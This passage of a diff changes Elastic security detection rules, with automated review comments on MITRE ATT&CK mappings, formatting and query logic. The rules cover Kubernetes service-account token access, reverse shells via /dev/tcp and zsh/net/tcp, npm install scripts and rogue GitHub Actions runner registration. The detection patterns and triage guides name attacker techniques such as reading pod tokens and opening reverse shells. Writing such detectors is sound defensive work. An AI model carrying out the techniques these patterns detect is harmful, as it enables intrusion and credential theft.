+reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" 
+reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml new file mode 100644 index 00000000000..95229fe817d --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml 
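Review bot: In the audit subsequence, the branch `or (kubernetes.audit.objectRef.resource == "pods" and kubernetes.audit.objectRef.subresource in ("exec", "attach", "portforward", "log"))` is redundant: `"pods"` is already the first entry of the preceding `objectRef.resource in (...)` list, so that branch can never add a match and the exec/attach/portforward/log distinction the description calls out is not actually enforced. Either drop the branch, or if only those subresource operations on pods are of interest, remove `"pods"` from the first list. Also note that the `not (...)` exclusion in the process subsequence only excludes shells whose args name a listed tool, so an interactive `bash` or `sh` opened via kubectl exec is itself an "unusual utility" here; with `maxspan=1s` and a pod-name-only join, a pod whose own workload polls pods or configmaps will alert whenever an operator opens a shell, which the `false_positives` entries only partly cover.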
@@ -0,0 +1,137 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the access to the service +account token or certificate followed by the execution of a direct interactive Kubernetes API request. An adversary may +need to access the service account token or certificate to gain access to the Kubernetes API server or other resources +within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the +cluster, and may indicate an attempt to move laterally within the cluster. +""" +false_positives = [ + """ + There is a potential for false positives if the access to the service account token or certificate is used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Service Account Token or Certificate Access Followed by Kubernetes API Request" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Service Account Token or Certificate Access Followed by Kubernetes API Request + +This rule correlates interactive access to a pod’s service account token or CA certificate with a near-immediate Kubernetes API request, signaling credential harvesting to query the cluster and potential lateral movement. An attacker execs into a container, reads /var/run/secrets/kubernetes.io/serviceaccount/token and ca.crt, then uses curl or kubectl with that token and CA to list pods, get secrets, or create a privileged pod to pivot across nodes. + +### Possible investigation steps + +- Attribute the activity by identifying the pod, container image, node, and interactive session initiator (e.g., kubectl exec) from Kubernetes events and cluster logs to determine whether a human or automation accessed the credentials. +- Retrieve the pod’s service account and enumerate its RBAC bindings to assess effective privileges, highlighting any ability to read secrets, create pods, or modify roles. +- Reconstruct the full sequence of audit log requests tied to that pod/user around the alert, noting resources, verbs, namespaces, response codes, and userAgent to distinguish legitimate controller behavior from reconnaissance. +- Examine the container for signs of token abuse or exfiltration by reviewing shell history and filesystem artifacts, and correlate with network egress from the pod to external destinations. +- Validate that the API request originated from the same pod by matching source IP, node, and TLS client identity, and check for concurrent suspicious activity on the node or other pods. 
+ +### False positive analysis + +- A cluster operator troubleshooting an issue execs into a pod, inspects the service account token or CA certificate, and then uses the pod’s credentials to make a quick Kubernetes API request to verify permissions or list resources. +- A workload running with TTY/stdin enabled is marked as interactive, and the application legitimately reads the service account token (e.g., on startup or token refresh) to perform routine API operations such as leader election or informer watches, producing the observed file access followed by audit log activity. + +### Response and remediation + +- Immediately isolate the pod that read /var/run/secrets/kubernetes.io/serviceaccount/token or ca.crt by deleting the pod or scaling its deployment to zero, cordoning its node if similar behavior is seen on other pods, and applying a NetworkPolicy that blocks the pod’s access to the API server while you capture its filesystem. +- Revoke access by removing the implicated service account’s RBAC bindings, recreating the service account to invalidate tokens, restarting any workloads that mount /var/run/secrets/kubernetes.io/serviceaccount, and rotating the service-account signing key if compromise is suspected. +- Validate and recover by reviewing audit records for unauthorized actions (e.g., secrets reads, pod or role changes), rolling back or deleting any malicious resources, and redeploying affected workloads from trusted images with signed releases. +- Escalate to incident response immediately if you observe API requests from the pod that read secrets, create pods in other namespaces, alter Role or ClusterRoleBindings, or transmit the token/ca.crt via curl or similar tooling to external addresses. 
+- Harden by disabling automountServiceAccountToken on pods that don't require it, scoping service accounts to a single namespace with least‑privilege RBAC, enforcing Pod Security Admission to block privileged/interactive shells, and restricting exec/attach via RBAC or admission policies. +""" +risk_score = 47 +rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=60s + [file where host.os.type == "linux" and event.type == "change" and event.action == "open" and + file.path in ("/var/run/secrets/kubernetes.io/serviceaccount/token", "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt") and + process.interactive == true and container.id like "*"] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials 
In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml index 8370e42b986..0074a431b39 100644 --- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml +++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/12" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/12" [rule] author = ["Elastic"] @@ -88,22 +88,12 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Exploitation for Client Execution" + id = "T1203" + reference = "https://attack.mitre.org/techniques/T1203/" 
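Review bot: The second sequence step in `query` matches any `kubernetes.audit_logs` event in stage ResponseStarted/ResponseComplete, so once an interactive token read occurs, a routine request from the same pod (the leader-election and informer watches that the false-positive section itself describes) completes the sequence. The sibling rule earlier in this diff constrains the same step by `kubernetes.audit.verb` and `kubernetes.audit.objectRef.resource`; narrowing this one the same way, or at least excluding `watch`, would keep the alert tied to the credential-access and discovery behaviour the threat mapping claims. Separately, `note = """ ## Triage and analysis` carries a space before the heading that no other rule in this diff has; if that is in the file rather than a rendering artifact it is worth dropping.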
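Review bot: The rewritten threat block at the end of this hunk indents the keys under `[rule.threat.tactic]` and `[[rule.threat.technique]]` and places the tactic before the technique, which no other rule file in this diff does; the convention visible everywhere else is unindented keys with `[[rule.threat.technique]]` first and `[rule.threat.tactic]` last. TOML accepts either, but the next formatting pass will churn these lines straight back. Dropping T1059/T1059.004 also leaves only T1203 under Execution; if that is deliberate it deserves a line in the commit message, since the rule's query and tags sit outside this hunk and I cannot confirm they still agree with the mapping.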
diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml index 5433f0a5906..13869c98f9b 100644 --- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml +++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/03" [rule] author = ["Elastic"] @@ -50,7 +50,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -61,6 +73,16 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" 
@@ -75,3 +97,29 @@ reference = "https://attack.mitre.org/techniques/T1204/005/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml index fe4247891cb..919bf598224 100644 --- a/rules/cross-platform/execution_openclaw_agent_child_process.toml +++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -56,7 +56,18 @@ references = [ risk_score = 47 rule_id = "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e" severity = "medium" -tags = ["Domain: Endpoint", "Domain: LLM", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: LLM", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
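Review bot: The new Defense Evasion `[[rule.threat]]` entry at the end of the hunk has a tactic but no technique, so the `Tactic: Defense Evasion` tag added in the earlier tags hunk is backed only by a tactic name. The tag/tactic helper in the test file will accept that, but an analyst gets nothing to pivot on; if a specific technique is meant it should be listed, otherwise the tactic and the tag could be dropped together. T1543 and T1574 under Persistence are plausible for package lifecycle scripts, but the query is outside this hunk so I cannot confirm they match what the rule actually detects.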
@@ -72,51 +83,36 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] -framework = "MITRE ATLAS" - +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "AML.T0051" -name = "LLM Prompt Injection" -reference = "https://atlas.mitre.org/techniques/AML.T0051/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + 
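Review bot: This hunk removes the MITRE ATLAS `[[rule.threat]]` entry (AML.T0051 / AML.TA0005 Execution) while the `Domain: LLM` tag stays, and while the `test_duplicated_tactics` change in this same patch exists precisely to allow ATT&CK and ATLAS entries that share a display name such as Execution; if the ATLAS mapping is meant to go, no rule in this patch exercises that test change any more, and if it is not, this rule should keep both entries. The blank-line layout on the new side is also irregular: the blank line between `reference` and the second `[[rule.threat]]` is removed while two blank lines sit before the final `[rule.threat.tactic]`. The PowerShell and Windows Command Shell subtechniques are dropped while `OS: Windows` remains in the tags hunk; the query is outside this hunk so I cannot tell whether it still covers Windows hosts.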
diff --git a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml index 7c525f9c541..e69435f0dc9 100644 --- a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml +++ b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -67,3 +67,21 @@ EggShell is a post-exploitation tool used on macOS and Linux systems, allowing a - Enhance monitoring and detection capabilities to identify similar threats in the future, focusing on command and scripting interpreter activities as outlined in MITRE ATT&CK technique T1059.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_potential_widespread_malware_infection.toml b/rules/cross-platform/execution_potential_widespread_malware_infection.toml index e884ea942a1..3f52c996a02 100644 --- a/rules/cross-platform/execution_potential_widespread_malware_infection.toml +++ b/rules/cross-platform/execution_potential_widespread_malware_infection.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/05/08" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/16" [rule] author = ["Elastic"] 
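Review bot: The added threat block runs `[[rule.threat]]`, `framework`, `[[rule.threat.technique]]` and the subtechnique table together with no blank line between them, then puts three blank lines before `[rule.threat.tactic]` and a trailing blank `+` line at end of file; the same layout appears in the `execution_potential_widespread_malware_infection.toml`, `execution_register_github_actions_runner.toml` and `execution_revershell_via_shell_cmd.toml` hunks below. Every other rule in this diff separates tables with one blank line and ends at the tactic `reference`, so these files will be rewritten by the next formatter run and make the diff noisier than the tag/tactic change needs. Whether this file's `tags` already carries `Tactic: Execution` is outside the hunk; the new tag/tactic test will flag it if not.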
@@ -72,3 +72,21 @@ from logs-endpoint.alerts-* ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml index 477b492e00c..4a04cf04a54 100644 --- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml +++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/27" [rule] author = ["Elastic"] 
@@ -83,7 +83,20 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,6 +112,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml new file mode 100644 index 00000000000..bd5c534de51 --- /dev/null +++ b/rules/cross-platform/execution_register_github_actions_runner.toml 
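Review bot: The tags hunk drops `Tactic: Privilege Escalation`, but the threat section is only partly visible: the following hunk ends inside the Execution entry at `T1609`, so whether a Privilege Escalation `[[rule.threat]]` entry (T1611 Escape to Host would be the usual one for a privileged container with host references) still follows is not shown. If it does, the new `_mitre_tactic_tag_gaps` helper in the test file will report the missing `Tactic: Privilege Escalation` tag; if it was removed in an earlier commit that is fine, but the pairing should be checked before merging. Adding T1059/T1059.004 ahead of T1609 is consistent with the other rules in this diff.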
@@ -0,0 +1,126 @@ +[metadata] +creation_date = "2025/11/26" +integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] +maturity = "production" +updated_date = "2025/11/26" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the configuration of a GitHub Actions self-hosted runner using the Runner.Listener binary. +When a machine is registered to a remote repository, its owner gains the ability to execute arbitrary workflow commands on that host. +Unexpected or unauthorized runner registration may indicate adversarial activity aimed at establishing remote code execution +via malicious GitHub workflows. +""" +false_positives = [ + "Authorized github repository with no malicious workflow actions.", +] +from = "now-9m" +index = [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" +] +language = "eql" +license = "Elastic License v2" +name = "Remote GitHub Actions Runner Registration" +note = """## Triage and analysis + +### Investigating Remote GitHub Actions Runner Registration + +Unexpected or unauthorized Github actions runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows. + +### Possible investigation steps + +- Review the remote repository details and reputation. +- Examine the remote repository for any suspicious workflows run commands in the `.github/workflows` folder. +- Examine the execution context like process tree, associated network and file activities. +- Verify if there is adjascent any sensitive file access or collection. +- Correlate with other alerts and investiguate if this activity is related to a supply chain attack. 
+ +### False positive analysis + +- Authorized configuration changes. + +### Response and remediation + +- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement. +- Terminate any suspicious child processes that were initiated by the registered Github actions runner. +- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise. +- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed. +- Implement application whitelisting to prevent unauthorized execution. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.""" +references = [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2", +] +risk_score = 47 +rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" +severity = "medium" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" + +query = ''' +process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and + process.name in ("Runner.Listener", "Runner.Listener.exe") and + process.args == "configure" and process.args == "--url" and process.args == "--token" +''' + + +[[rule.threat]] +framework = 
"MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml new file mode 100644 index 00000000000..62a96f31eb4 --- /dev/null +++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml 
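Review bot: The triage text in `note` has several spelling errors that will ship to analysts: `adjascent` → `adjacent`, `investiguate` → `investigate`, `Github actions runner` → `GitHub Actions runner` (twice), and `suspicious workflows run commands` → `suspicious workflow run commands`. The query itself reads correctly for its purpose — `Runner.Listener` with `configure`, `--url` and `--token` all present in `process.args` — though equality on an array field matches any element, so argument order is not enforced; that is acceptable here but is worth a line in `description` so nobody later tightens it assuming ordering. A `creation_date`/`updated_date` of 2025/11/26 on a file added in a March 2026 patch suggests a move or re-add rather than a new rule, which the commit message should say.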
@@ -0,0 +1,102 @@ +[metadata] +creation_date = "2020/01/07" +integration = ["endpoint"] +maturity = "production" +updated_date = "2024/09/23" + +[rule] +author = ["Elastic"] +description = "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity." +from = "now-9m" +index = ["auditbeat-*", "logs-endpoint.events.*"] +language = "eql" +license = "Elastic License v2" +name = "Potential Reverse Shell Activity via Terminal" +note = """## Triage and analysis + +### Investigating Potential Reverse Shell Activity via Terminal + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. + +This rule identifies commands that are potentially related to reverse shell activities using shell applications. + +#### Possible investigation steps + +- Examine the command line and extract the target domain or IP address information. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +""" +references = [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/WangYihang/Reverse-Shell-Manager", + "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/", + "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", +] +risk_score = 73 +rule_id = "a1a0375f-22c2-48c0-81a4-7c2d11cc6856" +setup = """## Setup + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, +events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. +Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate +`event.ingested` to @timestamp. 
+For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html +""" +severity = "high" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] +timestamp_override = "event.ingested" +type = "eql" + +query = ''' +process where event.type in ("start", "process_started") and + process.name in ("sh", "bash", "zsh", "dash", "zmodload") and + process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and + + /* noisy FPs */ + not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and + not process.parent.command_line : "runc init" +''' + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml 